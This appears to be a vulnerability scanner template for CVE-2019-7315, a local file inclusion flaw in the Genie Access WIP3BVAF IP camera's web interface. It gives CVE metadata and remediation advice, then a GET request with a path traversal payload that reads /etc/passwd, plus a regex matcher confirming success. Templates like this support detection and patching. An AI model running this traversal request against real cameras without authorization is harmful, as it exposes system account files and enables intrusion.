45 lines
1.5 KiB
YAML
45 lines
1.5 KiB
YAML
id: CVE-2019-7315
|
|
|
|
info:
|
|
name: Genie Access WIP3BVAF IP Camera - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to local file inclusion via the web interface, as demonstrated by reading /etc/shadow.
|
|
remediation: |
|
|
Apply the latest firmware update provided by the vendor to fix the local file inclusion vulnerability.
|
|
reference:
|
|
- https://labs.nettitude.com/blog/cve-2019-7315-genie-access-wip3bvaf-ip-camera-directory-traversal/
|
|
- https://vuldb.com/?id.136593
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-7315
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2019-7315
|
|
cwe-id: CWE-22
|
|
epss-score: 0.0138
|
|
epss-percentile: 0.84911
|
|
cpe: cpe:2.3:o:genieaccess:wip3bvaf_firmware:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: genieaccess
|
|
product: wip3bvaf_firmware
|
|
tags: cve,cve2019,camera,genie,lfi,iot
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022100bc39002680de981c82835c218e062364f3b9b01fdf0389102127e0b71bfe2ef2022000da058489c4ec83163bc3fe1e8e9fd38ba889d6112b298116cd8b313d1fba01:922c64590222798bb761d5b6d8e72950
|